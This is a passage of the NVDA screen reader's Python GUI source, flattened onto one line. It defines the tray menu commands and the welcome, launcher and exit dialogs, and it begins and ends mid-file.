temporary speech dictionary dialog (the voice dictionary that is active as long as NvDA is running). self._popupSettingsDialog(DictionaryDialog,_("Temporary dictionary"),speechDictHandler.dictionaries["temp"]) def onExecuteUpdateCommand(self, evt): if updateCheck and updateCheck.isPendingUpdate(): destPath, version, apiVersion, backCompatToAPIVersion = updateCheck.getPendingUpdate() from addonHandler import getIncompatibleAddons if any(getIncompatibleAddons(apiVersion, backCompatToAPIVersion)): confirmUpdateDialog = updateCheck.UpdateAskInstallDialog( parent=gui.mainFrame, destPath=destPath, version=version, apiVersion=apiVersion, backCompatTo=backCompatToAPIVersion ) gui.runScriptModalDialog(confirmUpdateDialog) else: updateCheck.executePendingUpdate() def evaluateUpdatePendingUpdateMenuItemCommand(self): try: self.sysTrayIcon.menu.Remove(self.sysTrayIcon.installPendingUpdateMenuItem) except: log.debug("Error while removing pending update menu item", exc_info=True) pass if not globalVars.appArgs.secure and updateCheck and updateCheck.isPendingUpdate(): self.sysTrayIcon.menu.Insert(self.sysTrayIcon.installPendingUpdateMenuItemPos,self.sysTrayIcon.installPendingUpdateMenuItem) def onExitCommand(self, evt): if config.conf["general"]["askToExit"]: self.prePopup() d = ExitDialog(self) d.Raise() d.Show() self.postPopup() else: wx.GetApp().ExitMainLoop() def onNVDASettingsCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog) def onGeneralSettingsCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, GeneralSettingsPanel) def onSelectSynthesizerCommand(self,evt): self._popupSettingsDialog(SynthesizerSelectionDialog) def onSpeechSettingsCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, SpeechSettingsPanel) def onSelectBrailleDisplayCommand(self,evt): self._popupSettingsDialog(BrailleDisplaySelectionDialog) def onBrailleSettingsCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, BrailleSettingsPanel) def onKeyboardSettingsCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, KeyboardSettingsPanel) def onMouseSettingsCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, MouseSettingsPanel) def onTouchInteractionCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, TouchInteractionPanel) def onReviewCursorCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, ReviewCursorPanel) def onInputCompositionCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, InputCompositionPanel) def onObjectPresentationCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, ObjectPresentationPanel) def onBrowseModeCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, BrowseModePanel) def onDocumentFormattingCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, DocumentFormattingPanel) def onUwpOcrCommand(self, evt): self._popupSettingsDialog(NVDASettingsDialog, UwpOcrPanel) def onSpeechSymbolsCommand(self, evt): self._popupSettingsDialog(SpeechSymbolsDialog) def onInputGesturesCommand(self, evt): self._popupSettingsDialog(InputGesturesDialog) def onAboutCommand(self,evt): # Translators: The title of the dialog to show about info for NVDA. messageBox(versionInfo.aboutMessage, _("About NVDA"), wx.OK) def onCheckForUpdateCommand(self, evt): updateCheck.UpdateChecker().check() def onViewLogCommand(self, evt): logViewer.activate() def onSpeechViewerEnabled(self, isEnabled): # its possible for this to be called after the sysTrayIcon is destroyed if we are exiting NVDA if self.sysTrayIcon and self.sysTrayIcon.menu_tools_toggleSpeechViewer: self.sysTrayIcon.menu_tools_toggleSpeechViewer.Check(isEnabled) def onToggleSpeechViewerCommand(self, evt): if not speechViewer.isActive: speechViewer.activate() else: speechViewer.deactivate() def onBrailleViewerChangedState(self, created): # its possible for this to be called after the sysTrayIcon is destroyed if we are exiting NVDA if self.sysTrayIcon and self.sysTrayIcon.menu_tools_toggleBrailleViewer: self.sysTrayIcon.menu_tools_toggleBrailleViewer.Check(created) def onToggleBrailleViewerCommand(self, evt): import brailleViewer if brailleViewer.isBrailleViewerActive(): brailleViewer.destroyBrailleViewer() else: brailleViewer.createBrailleViewerTool() def onPythonConsoleCommand(self, evt): import pythonConsole if not pythonConsole.consoleUI: pythonConsole.initialize() pythonConsole.activate() def onAddonsManagerCommand(self,evt): if isInMessageBox: return self.prePopup() from .addonGui import AddonsDialog d=AddonsDialog(gui.mainFrame) d.Show() self.postPopup() def onReloadPluginsCommand(self, evt): import appModuleHandler, globalPluginHandler from NVDAObjects import NVDAObject appModuleHandler.reloadAppModules() globalPluginHandler.reloadGlobalPlugins() NVDAObject.clearDynamicClassCache() def onCreatePortableCopyCommand(self,evt): if isInMessageBox: return self.prePopup() import gui.installerGui d=gui.installerGui.PortableCreaterDialog(gui.mainFrame) d.Show() self.postPopup() def onInstallCommand(self, evt): if isInMessageBox: return from gui import installerGui installerGui.showInstallGui() def onRunCOMRegistrationFixesCommand(self, evt): if isInMessageBox: return if gui.messageBox( # Translators: A message to warn the user when starting the COM Registration Fixing tool _("You are about to run the COM Registration Fixing tool. This tool will try to fix common system problems that stop NVDA from being able to access content in many programs including Firefox and Internet Explorer. This tool must make changes to the System registry and therefore requires administrative access. Are you sure you wish to proceed?"), # Translators: The title of the warning dialog displayed when launching the COM Registration Fixing tool _("Warning"),wx.YES|wx.NO|wx.ICON_WARNING,self )==wx.NO: return progressDialog = IndeterminateProgressDialog(mainFrame, # Translators: The title of the dialog presented while NVDA is running the COM Registration fixing tool _("COM Registration Fixing Tool"), # Translators: The message displayed while NVDA is running the COM Registration fixing tool _("Please wait while NVDA tries to fix your system's COM registrations.") ) try: import systemUtils systemUtils.execElevated(config.SLAVE_FILENAME, ["fixCOMRegistrations"]) except: log.error("Could not execute fixCOMRegistrations command",exc_info=True) progressDialog.done() del progressDialog # Translators: The message displayed when the COM Registration Fixing tool completes. gui.messageBox(_("COM Registration Fixing tool complete"), # Translators: The title of a dialog presented when the COM Registration Fixing tool is complete. _("COM Registration Fixing Tool"), wx.OK) def onConfigProfilesCommand(self, evt): if isInMessageBox: return self.prePopup() from .configProfiles import ProfilesDialog ProfilesDialog(gui.mainFrame).Show() self.postPopup() class SysTrayIcon(wx.adv.TaskBarIcon): def __init__(self, frame): super(SysTrayIcon, self).__init__() icon=wx.Icon(ICON_PATH,wx.BITMAP_TYPE_ICO) self.SetIcon(icon, versionInfo.name) self.menu=wx.Menu() menu_preferences=self.preferencesMenu=wx.Menu() item = menu_preferences.Append(wx.ID_ANY, # Translators: The label for the menu item to open NVDA Settings dialog. _("&Settings..."), # Translators: The description for the menu item to open NVDA Settings dialog. _("NVDA settings")) self.Bind(wx.EVT_MENU, frame.onNVDASettingsCommand, item) subMenu_speechDicts = wx.Menu() if not globalVars.appArgs.secure: item = subMenu_speechDicts.Append( wx.ID_ANY, # Translators: The label for the menu item to open Default speech dictionary dialog. _("&Default dictionary..."), # Translators: The help text for the menu item to open Default speech dictionary dialog. _("A dialog where you can set default dictionary by adding dictionary entries to the list") ) self.Bind(wx.EVT_MENU, frame.onDefaultDictionaryCommand, item) item = subMenu_speechDicts.Append( wx.ID_ANY, # Translators: The label for the menu item to open Voice specific speech dictionary dialog. _("&Voice dictionary..."), _( # Translators: The help text for the menu item # to open Voice specific speech dictionary dialog. "A dialog where you can set voice-specific dictionary by adding" " dictionary entries to the list" ) ) self.Bind(wx.EVT_MENU, frame.onVoiceDictionaryCommand, item) item = subMenu_speechDicts.Append( wx.ID_ANY, # Translators: The label for the menu item to open Temporary speech dictionary dialog. _("&Temporary dictionary..."), # Translators: The help text for the menu item to open Temporary speech dictionary dialog. _("A dialog where you can set temporary dictionary by adding dictionary entries to the edit box") ) self.Bind(wx.EVT_MENU, frame.onTemporaryDictionaryCommand, item) # Translators: The label for a submenu under NvDA Preferences menu to select speech dictionaries. menu_preferences.AppendSubMenu(subMenu_speechDicts,_("Speech &dictionaries")) if not globalVars.appArgs.secure: # Translators: The label for the menu item to open Punctuation/symbol pronunciation dialog. item = menu_preferences.Append(wx.ID_ANY, _("&Punctuation/symbol pronunciation...")) self.Bind(wx.EVT_MENU, frame.onSpeechSymbolsCommand, item) # Translators: The label for the menu item to open the Input Gestures dialog. item = menu_preferences.Append(wx.ID_ANY, _("I&nput gestures...")) self.Bind(wx.EVT_MENU, frame.onInputGesturesCommand, item) # Translators: The label for Preferences submenu in NVDA menu. self.menu.AppendSubMenu(menu_preferences,_("&Preferences")) menu_tools = self.toolsMenu = wx.Menu() if not globalVars.appArgs.secure: # Translators: The label for the menu item to open NVDA Log Viewer. item = menu_tools.Append(wx.ID_ANY, _("View log")) self.Bind(wx.EVT_MENU, frame.onViewLogCommand, item) # Translators: The label for the menu item to toggle Speech Viewer. item=self.menu_tools_toggleSpeechViewer = menu_tools.AppendCheckItem(wx.ID_ANY, _("Speech viewer")) self.Bind(wx.EVT_MENU, frame.onToggleSpeechViewerCommand, item) self.menu_tools_toggleBrailleViewer: wx.MenuItem = menu_tools.AppendCheckItem( wx.ID_ANY, # Translators: The label for the menu item to toggle Braille Viewer. _("Braille viewer") ) item = self.menu_tools_toggleBrailleViewer self.Bind(wx.EVT_MENU, frame.onToggleBrailleViewerCommand, item) import brailleViewer self.menu_tools_toggleBrailleViewer.Check(brailleViewer.isBrailleViewerActive()) brailleViewer.postBrailleViewerToolToggledAction.register(frame.onBrailleViewerChangedState) if not globalVars.appArgs.secure and not config.isAppX: # Translators: The label for the menu item to open NVDA Python Console. item = menu_tools.Append(wx.ID_ANY, _("Python console")) self.Bind(wx.EVT_MENU, frame.onPythonConsoleCommand, item) # Translators: The label of a menu item to open the Add-ons Manager. item = menu_tools.Append(wx.ID_ANY, _("Manage &add-ons...")) self.Bind(wx.EVT_MENU, frame.onAddonsManagerCommand, item) if not globalVars.appArgs.secure and not config.isAppX and getattr(sys,'frozen',None): # Translators: The label for the menu item to create a portable copy of NVDA from an installed or another portable version. item = menu_tools.Append(wx.ID_ANY, _("Create portable copy...")) self.Bind(wx.EVT_MENU, frame.onCreatePortableCopyCommand, item) if not config.isInstalledCopy(): # Translators: The label for the menu item to install NVDA on the computer. item = menu_tools.Append(wx.ID_ANY, _("&Install NVDA...")) self.Bind(wx.EVT_MENU, frame.onInstallCommand, item) # Translators: The label for the menu item to run the COM registration fix tool item = menu_tools.Append(wx.ID_ANY, _("Run COM Registration Fixing tool...")) self.Bind(wx.EVT_MENU, frame.onRunCOMRegistrationFixesCommand, item) if not config.isAppX: # Translators: The label for the menu item to reload plugins. item = menu_tools.Append(wx.ID_ANY, _("Reload plugins")) self.Bind(wx.EVT_MENU, frame.onReloadPluginsCommand, item) # Translators: The label for the Tools submenu in NVDA menu. self.menu.AppendSubMenu(menu_tools,_("Tools")) menu_help = self.helpMenu = wx.Menu() if not globalVars.appArgs.secure: # Translators: The label of a menu item to open NVDA user guide. item = menu_help.Append(wx.ID_ANY, _("&User Guide")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile(getDocFilePath("userGuide.html")), item) # Translators: The label of a menu item to open the Commands Quick Reference document. item = menu_help.Append(wx.ID_ANY, _("Commands &Quick Reference")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile(getDocFilePath("keyCommands.html")), item) # Translators: The label for the menu item to open What's New document. item = menu_help.Append(wx.ID_ANY, _("What's &new")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile(getDocFilePath("changes.html")), item) item = menu_help.Append(wx.ID_ANY, _("NVDA &web site")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile("http://www.nvda-project.org/"), item) # Translators: The label for the menu item to view NVDA License document. item = menu_help.Append(wx.ID_ANY, _("L&icense")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile(getDocFilePath("copying.txt", False)), item) # Translators: The label for the menu item to view NVDA Contributors list document. item = menu_help.Append(wx.ID_ANY, _("C&ontributors")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile(getDocFilePath("contributors.txt", False)), item) # Translators: The label for the menu item to open NVDA Welcome Dialog. item = menu_help.Append(wx.ID_ANY, _("We&lcome dialog...")) self.Bind(wx.EVT_MENU, lambda evt: WelcomeDialog.run(), item) menu_help.AppendSeparator() if updateCheck: # Translators: The label of a menu item to manually check for an updated version of NVDA. item = menu_help.Append(wx.ID_ANY, _("&Check for update...")) self.Bind(wx.EVT_MENU, frame.onCheckForUpdateCommand, item) # Translators: The label for the menu item to open About dialog to get information about NVDA. item = menu_help.Append(wx.ID_ABOUT, _("About..."), _("About NVDA")) self.Bind(wx.EVT_MENU, frame.onAboutCommand, item) # Translators: The label for the Help submenu in NVDA menu. self.menu.AppendSubMenu(menu_help,_("&Help")) self.menu.AppendSeparator() # Translators: The label for the menu item to open the Configuration Profiles dialog. item = self.menu.Append(wx.ID_ANY, _("&Configuration profiles...")) self.Bind(wx.EVT_MENU, frame.onConfigProfilesCommand, item) # Translators: The label for the menu item to revert to saved configuration. item = self.menu.Append(wx.ID_ANY, _("&Revert to saved configuration"),_("Reset all settings to saved state")) self.Bind(wx.EVT_MENU, frame.onRevertToSavedConfigurationCommand, item) if not globalVars.appArgs.secure: # Translators: The label for the menu item to reset settings to default settings. # Here, default settings means settings that were there when the user first used NVDA. item = self.menu.Append(wx.ID_ANY, _("&Reset configuration to factory defaults"),_("Reset all settings to default state")) self.Bind(wx.EVT_MENU, frame.onRevertToDefaultConfigurationCommand, item) # Translators: The label for the menu item to save current settings. item = self.menu.Append(wx.ID_SAVE, _("&Save configuration"), _("Write the current configuration to nvda.ini")) self.Bind(wx.EVT_MENU, frame.onSaveConfigurationCommand, item) self.menu.AppendSeparator() # Translators: The label for the menu item to open donate page. item = self.menu.Append(wx.ID_ANY, _("Donate")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile(DONATE_URL), item) self.installPendingUpdateMenuItemPos = self.menu.GetMenuItemCount() item = self.installPendingUpdateMenuItem = self.menu.Append(wx.ID_ANY, # Translators: The label for the menu item to run a pending update. _("Install pending &update"), # Translators: The description for the menu item to run a pending update. _("Execute a previously downloaded NVDA update")) self.Bind(wx.EVT_MENU, frame.onExecuteUpdateCommand, item) self.menu.AppendSeparator() item = self.menu.Append(wx.ID_EXIT, _("E&xit"),_("Exit NVDA")) self.Bind(wx.EVT_MENU, frame.onExitCommand, item) self.Bind(wx.adv.EVT_TASKBAR_LEFT_DOWN, self.onActivate) self.Bind(wx.adv.EVT_TASKBAR_RIGHT_DOWN, self.onActivate) def Destroy(self): self.menu.Destroy() super(SysTrayIcon, self).Destroy() def onActivate(self, evt): mainFrame.prePopup() import appModules.nvda if not appModules.nvda.nvdaMenuIaIdentity: # The NVDA app module doesn't know how to identify the NVDA menu yet. # Signal that the NVDA menu has just been opened. appModules.nvda.nvdaMenuIaIdentity = True self.PopupMenu(self.menu) if appModules.nvda.nvdaMenuIaIdentity is True: # The NVDA menu didn't actually appear for some reason. appModules.nvda.nvdaMenuIaIdentity = None mainFrame.postPopup() def initialize(): global mainFrame if mainFrame: raise RuntimeError("GUI already initialized") mainFrame = MainFrame() wx.GetApp().SetTopWindow(mainFrame) # In wxPython >= 4.1, # wx.CallAfter no longer executes callbacks while NVDA's main thread is within apopup menu or message box. # To work around this, # Monkeypatch wx.CallAfter to # post a WM_NULL message to our top-level window after calling the original CallAfter, # which causes wx's event loop to wake up enough to execute the callback. old_wx_CallAfter = wx.CallAfter def wx_CallAfter_wrapper(func, *args, **kwargs): old_wx_CallAfter(func, *args, **kwargs) # mainFrame may be None as NVDA could be terminating. topHandle = mainFrame.Handle if mainFrame else None if topHandle: winUser.PostMessage(topHandle, winUser.WM_NULL, 0, 0) wx.CallAfter = wx_CallAfter_wrapper def terminate(): import brailleViewer brailleViewer.destroyBrailleViewer() for instance, state in gui.SettingsDialog._instances.items(): if state is gui.SettingsDialog._DIALOG_DESTROYED_STATE: log.error( "Destroyed but not deleted instance of settings dialog exists: {!r}".format(instance) ) else: log.debug("Exiting NVDA with an open settings dialog: {!r}".format(instance)) global mainFrame # This is called after the main loop exits because WM_QUIT exits the main loop # without destroying all objects correctly and we need to support WM_QUIT. # Therefore, any request to exit should exit the main loop. wx.CallAfter(mainFrame.Destroy) # #4460: We need another iteration of the main loop # so that everything (especially the TaskBarIcon) is cleaned up properly. # ProcessPendingEvents doesn't seem to work, but MainLoop does. # Because the top window gets destroyed, # MainLoop thankfully returns pretty quickly. wx.GetApp().MainLoop() mainFrame = None def showGui(): wx.CallAfter(mainFrame.showGui) def quit(): wx.CallAfter(mainFrame.onExitCommand, None) def messageBox(message, caption=wx.MessageBoxCaptionStr, style=wx.OK | wx.CENTER, parent=None): """Display a message dialog. This should be used for all message dialogs rather than using C{wx.MessageDialog} and C{wx.MessageBox} directly. @param message: The message text. @type message: str @param caption: The caption (title) of the dialog. @type caption: str @param style: Same as for wx.MessageBox. @type style: int @param parent: The parent window (optional). @type parent: C{wx.Window} @return: Same as for wx.MessageBox. @rtype: int """ global isInMessageBox wasAlready = isInMessageBox isInMessageBox = True if not parent: mainFrame.prePopup() res = wx.MessageBox(message, caption, style, parent or mainFrame) if not parent: mainFrame.postPopup() if not wasAlready: isInMessageBox = False return res def runScriptModalDialog(dialog, callback=None): """Run a modal dialog from a script. This will not block the caller, but will instead call C{callback} (if provided) with the result from the dialog. The dialog will be destroyed once the callback has returned. @param dialog: The dialog to show. @type dialog: C{wx.Dialog} @param callback: The optional callable to call with the result from the dialog. @type callback: callable """ def run(): mainFrame.prePopup() res = dialog.ShowModal() mainFrame.postPopup() if callback: callback(res) dialog.Destroy() wx.CallAfter(run) class WelcomeDialog( _ContextHelpMixin, wx.Dialog # wxPython does not seem to call base class initializer, put last in MRO ): """The NVDA welcome dialog. This provides essential information for new users, such as a description of the NVDA key and instructions on how to activate the NVDA menu. It also provides quick access to some important configuration options. This dialog is displayed the first time NVDA is started with a new configuration. """ helpId = "WelcomeDialog" WELCOME_MESSAGE_DETAIL = _( # Translators: The main message for the Welcome dialog when the user starts NVDA for the first time. "Most commands for controlling NVDA require you to hold down" " the NVDA key while pressing other keys.\n" "By default, the numpad Insert and main Insert keys may both be used as the NVDA key.\n" "You can also configure NVDA to use the CapsLock as the NVDA key.\n" "Press NVDA+n at any time to activate the NVDA menu.\n" "From this menu, you can configure NVDA, get help and access other NVDA functions." ) def __init__(self, parent): # Translators: The title of the Welcome dialog when user starts NVDA for the first time. super(WelcomeDialog, self).__init__(parent, wx.ID_ANY, _("Welcome to NVDA")) mainSizer=wx.BoxSizer(wx.VERTICAL) # Translators: The header for the Welcome dialog when user starts NVDA for the first time. This is in larger, # bold lettering welcomeTextHeader = wx.StaticText(self, label=_("Welcome to NVDA!")) welcomeTextHeader.SetFont(wx.Font(18, wx.FONTFAMILY_DEFAULT, wx.NORMAL, wx.BOLD)) mainSizer.AddSpacer(guiHelper.SPACE_BETWEEN_VERTICAL_DIALOG_ITEMS) mainSizer.Add(welcomeTextHeader,border=20,flag=wx.EXPAND|wx.LEFT|wx.RIGHT) mainSizer.AddSpacer(guiHelper.SPACE_BETWEEN_VERTICAL_DIALOG_ITEMS) welcomeTextDetail = wx.StaticText(self, wx.ID_ANY, self.WELCOME_MESSAGE_DETAIL) mainSizer.Add(welcomeTextDetail,border=20,flag=wx.EXPAND|wx.LEFT|wx.RIGHT) optionsSizer = wx.StaticBoxSizer( wx.StaticBox( self, # Translators: The label for a group box containing the NVDA welcome dialog options. label=_("Options") ), wx.VERTICAL ) sHelper = guiHelper.BoxSizerHelper(self, sizer=optionsSizer) # Translators: The label of a combobox in the Welcome dialog. kbdLabelText = _("&Keyboard layout:") layouts = keyboardHandler.KeyboardInputGesture.LAYOUTS self.kbdNames = sorted(layouts) kbdChoices = [layouts[layout] for layout in self.kbdNames] self.kbdList = sHelper.addLabeledControl(kbdLabelText, wx.Choice, choices=kbdChoices) try: index = self.kbdNames.index(config.conf["keyboard"]["keyboardLayout"]) self.kbdList.SetSelection(index) except: log.error("Could not set Keyboard layout list to current layout",exc_info=True) # Translators: The label of a checkbox in the Welcome dialog. capsAsNVDAModifierText = _("&Use CapsLock as an NVDA modifier key") self.capsAsNVDAModifierCheckBox = sHelper.addItem(wx.CheckBox(self, label=capsAsNVDAModifierText)) self.capsAsNVDAModifierCheckBox.SetValue(config.conf["keyboard"]["useCapsLockAsNVDAModifierKey"]) # Translators: The label of a checkbox in the Welcome dialog. startAfterLogonText = _("St&art NVDA after I sign in") self.startAfterLogonCheckBox = sHelper.addItem(wx.CheckBox(self, label=startAfterLogonText)) self.startAfterLogonCheckBox.Value = config.getStartAfterLogon() if globalVars.appArgs.secure or config.isAppX or not config.isInstalledCopy(): self.startAfterLogonCheckBox.Disable() # Translators: The label of a checkbox in the Welcome dialog. showWelcomeDialogAtStartupText = _("&Show this dialog when NVDA starts") self.showWelcomeDialogAtStartupCheckBox = sHelper.addItem(wx.CheckBox(self, label=showWelcomeDialogAtStartupText)) self.showWelcomeDialogAtStartupCheckBox.SetValue(config.conf["general"]["showWelcomeDialogAtStartup"]) mainSizer.Add(optionsSizer, border=guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL) mainSizer.Add(self.CreateButtonSizer(wx.OK), border=guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL|wx.ALIGN_RIGHT) self.Bind(wx.EVT_BUTTON, self.onOk, id=wx.ID_OK) mainSizer.Fit(self) self.SetSizer(mainSizer) self.kbdList.SetFocus() self.CentreOnScreen() def onOk(self, evt): layout = self.kbdNames[self.kbdList.GetSelection()] config.conf["keyboard"]["keyboardLayout"] = layout config.conf["keyboard"]["useCapsLockAsNVDAModifierKey"] = self.capsAsNVDAModifierCheckBox.IsChecked() if self.startAfterLogonCheckBox.Enabled: config.setStartAfterLogon(self.startAfterLogonCheckBox.Value) config.conf["general"]["showWelcomeDialogAtStartup"] = self.showWelcomeDialogAtStartupCheckBox.IsChecked() try: config.conf.save() except: log.debugWarning("Could not save",exc_info=True) self.EndModal(wx.ID_OK) @classmethod def run(cls): """Prepare and display an instance of this dialog. This does not require the dialog to be instantiated. """ mainFrame.prePopup() d = cls(mainFrame) d.ShowModal() d.Destroy() mainFrame.postPopup() class LauncherDialog( _ContextHelpMixin, wx.Dialog # wxPython does not seem to call base class initializer, put last in MRO ): """The dialog that is displayed when NVDA is started from the launcher. This displays the license and allows the user to install or create a portable copy of NVDA. """ helpId = "InstallingNVDA" def __init__(self, parent): super(LauncherDialog, self).__init__(parent, title=versionInfo.name) mainSizer = wx.BoxSizer(wx.VERTICAL) sHelper = guiHelper.BoxSizerHelper(self, orientation=wx.VERTICAL) # Translators: The label of the license text which will be shown when NVDA installation program starts. groupLabel = _("License Agreement") sizer = sHelper.addItem(wx.StaticBoxSizer(wx.StaticBox(self, label=groupLabel), wx.VERTICAL)) licenseTextCtrl = wx.TextCtrl(self, size=(500, 400), style=wx.TE_MULTILINE | wx.TE_READONLY | wx.TE_RICH) licenseTextCtrl.Value = codecs.open(getDocFilePath("copying.txt", False), "r", encoding="UTF-8").read() sizer.Add(licenseTextCtrl) # Translators: The label for a checkbox in NvDA installation program to agree to the license agreement. agreeText = _("I &agree") self.licenseAgreeCheckbox = sHelper.addItem(wx.CheckBox(self, label=agreeText)) self.licenseAgreeCheckbox.Value = False self.licenseAgreeCheckbox.Bind(wx.EVT_CHECKBOX, self.onLicenseAgree) sizer = sHelper.addItem(wx.GridSizer(2, 2, 0, 0)) self.actionButtons = [] # Translators: The label of the button in NVDA installation program to install NvDA on the user's computer. ctrl = wx.Button(self, label=_("&Install NVDA on this computer")) sizer.Add(ctrl) ctrl.Bind(wx.EVT_BUTTON, lambda evt: self.onAction(evt, mainFrame.onInstallCommand)) self.actionButtons.append(ctrl) # Translators: The label of the button in NVDA installation program to create a portable version of NVDA. ctrl = wx.Button(self, label=_("Create &portable copy")) sizer.Add(ctrl) ctrl.Bind(wx.EVT_BUTTON, lambda evt: self.onAction(evt, mainFrame.onCreatePortableCopyCommand)) self.actionButtons.append(ctrl) # Translators: The label of the button in NVDA installation program to continue using the installation program as a temporary copy of NVDA. ctrl = wx.Button(self, label=_("&Continue running")) sizer.Add(ctrl) ctrl.Bind(wx.EVT_BUTTON, self.onContinueRunning) self.actionButtons.append(ctrl) sizer.Add(wx.Button(self, label=_("E&xit"), id=wx.ID_CANCEL)) # If we bind this on the button, it fails to trigger when the dialog is closed. self.Bind(wx.EVT_BUTTON, self.onExit, id=wx.ID_CANCEL) for ctrl in self.actionButtons: ctrl.Disable() mainSizer.Add(sHelper.sizer, border = guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL) self.Sizer = mainSizer mainSizer.Fit(self) self.CentreOnScreen() def onLicenseAgree(self, evt): for ctrl in self.actionButtons: ctrl.Enable(evt.IsChecked()) def onAction(self, evt, func): self.Destroy() func(evt) def onContinueRunning(self, evt): self.Destroy() core.doStartupDialogs() def onExit(self, evt): wx.GetApp().ExitMainLoop() @classmethod def run(cls): """Prepare and display an instance of this dialog. This does not require the dialog to be instantiated. """ mainFrame.prePopup() d = cls(mainFrame) d.Show() mainFrame.postPopup() class ExitDialog(wx.Dialog): _instance = None def __new__(cls, parent): # Make this a singleton. inst = cls._instance() if cls._instance else None if not inst: return super(cls, cls).__new__(cls, parent) return inst def __init__(self, parent): inst = ExitDialog._instance() if ExitDialog._instance else None if inst: return # Use a weakref so the instance can die. ExitDialog._instance = weakref.ref(self) # Translators: The title of the dialog to exit NVDA super(ExitDialog, self).__init__(parent, title=_("Exit NVDA")) dialog = self mainSizer = wx.BoxSizer(wx.VERTICAL) contentSizerHelper = guiHelper.BoxSizerHelper(self, orientation=wx.VERTICAL) if globalVars.appArgs.disableAddons: # Translators: A message in the exit Dialog shown when all add-ons are disabled. addonsDisabledText = _("All add-ons are now disabled. They will be re-enabled on the next restart unless you choose to disable them again.") contentSizerHelper.addItem(wx.StaticText(self, wx.ID_ANY, label=addonsDisabledText)) # Translators: The label for actions list in the Exit dialog. labelText=_("What would you like to &do?") self.actions = [ # Translators: An option in the combo box to choose exit action. _("Exit"), # Translators: An option in the combo box to choose exit action. _("Restart") ] # Windows Store version of NVDA does not support add-ons yet. if not config.isAppX: # Translators: An option in the combo box to choose exit action. self.actions.append(_("Restart with add-ons disabled")) # Translators: An option in the combo box to choose exit action. self.actions.append(_("Restart with debug logging enabled")) if updateCheck and updateCheck.isPendingUpdate(): # Translators: An option in the combo box to choose exit action. self.actions.append(_("Install pending update")) self.actionsList = contentSizerHelper.addLabeledControl(labelText, wx.Choice, choices=self.actions) self.actionsList.SetSelection(0) contentSizerHelper.addDialogDismissButtons(wx.OK | wx.CANCEL) self.Bind(wx.EVT_BUTTON, self.onOk, id=wx.ID_OK) self.Bind(wx.EVT_BUTTON, self.onCancel, id=wx.ID_CANCEL) mainSizer.Add(contentSizerHelper.sizer, border=guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL) mainSizer.Fit(self) self.Sizer = mainSizer self.actionsList.SetFocus() self.CentreOnScreen() def onOk(self, evt): action=self.actionsList.GetSelection() # Because Windows Store version of NVDA does not support add-ons yet, add 1 if action is 2 or above if this is such a case. if action >= 2 and config.isAppX: action += 1 if action == 0: wx.GetApp().ExitMainLoop() elif action == 1: queueHandler.queueFunction(queueHandler.eventQueue,core.restart) elif action == 2: queueHandler.queueFunction(queueHandler.eventQueue,core.restart,disableAddons=True) elif action == 3: queueHandler.queueFunction(queueHandler.eventQueue,core.restart,debugLogging=True) elif action == 4: if updateCheck: destPath, version, apiVersion, backCompatTo = updateCheck.getPendingUpdate() from addonHandler import getIncompatibleAddons if any(getIncompatibleAddons(currentAPIVersion=apiVersion, backCompatToAPIVersion=backCompatTo)): confirmUpdateDialog = updateCheck.UpdateAskInstallDialog( parent=gui.mainFrame, destPath=destPath, version=version, apiVersion=apiVersion, backCompatTo=backCompatTo ) confirmUpdateDialog.ShowModal() else: updateCheck.executePendingUpdate() self.Destroy() def onCancel(self, evt): self.Destroy() class ExecAndPump(threading.Thread): """Executes the given function with given args and kwargs in a background thread while blocking and pumping in the current thread.""" def __init__(self,func,*args,**kwargs): self.func=func self.args=args self.kwargs=kwargs fname = repr(func) super().__init__( name=f"{self.__class__.__module__}.{self.__class__.__qualname__}({fname})" ) self.threadExc=None self.start() time.sleep(0.1) threadHandle=ctypes.c_int() threadHandle.value=ctypes.windll.kernel32.OpenThread(0x100000,False,self.ident) msg=ctypes.wintypes.MSG() while ctypes.windll.user32.MsgWaitForMultipleObjects(1,ctypes.byref(threadHandle),False,-1,255)==1: while ctypes.windll.user32.PeekMessageW(ctypes.byref(msg),None,0,0,1): ctypes.windll.user32.TranslateMessage(ctypes.byref(msg)) ctypes.windll.user32.DispatchMessageW(ctypes.byref(msg)) if self.threadExc: raise self.threadExc def run(self): try: self.func(*self.args,**self.kwargs) except Exception as e: self.threadExc=e log.debugWarning("task had errors",exc_info=True) class IndeterminateProgressDialog(wx.ProgressDialog): def __init__(self, parent, title, message): super(IndeterminateProgressDialog, self).__init__(title, message, parent=parent) self._speechCounter = -1 self.timer = wx.PyTimer(self.Pulse) self.timer.Start(1000) self.Raise() self.CentreOnScreen() def Pulse(self): super(IndeterminateProgressDialog, self).Pulse() # We want progress to be spoken on the first pulse and every 10 pulses thereafter. # Therefore, cycle from 0 to 9 inclusive. self._speechCounter = (self._speechCounter + 1) % 10 pbConf = config.conf["presentation"]["progressBarUpdates"] if pbConf["progressBarOutputMode"] == "off": return if not pbConf["reportBackgroundProgressBars"] and not self.IsActive(): return if pbConf["progressBarOutputMode"] in ("beep", "both"): tones.beep(440, 40) if pbConf["progressBarOutputMode"] in ("speak", "both") and self._speechCounter == 0: # Translators: Announced periodically to indicate progress for an indeterminate progress bar. speech.speakMessage(_("Please wait")) def IsActive(self): #4714: In wxPython 3, ProgressDialog.IsActive always seems to return False. return winUser.isDescendantWindow(winUser.getForegroundWindow(), self.Handle) def done(self): self.timer.Stop() pbConf = config.conf["presentation"]["progressBarUpdates"] 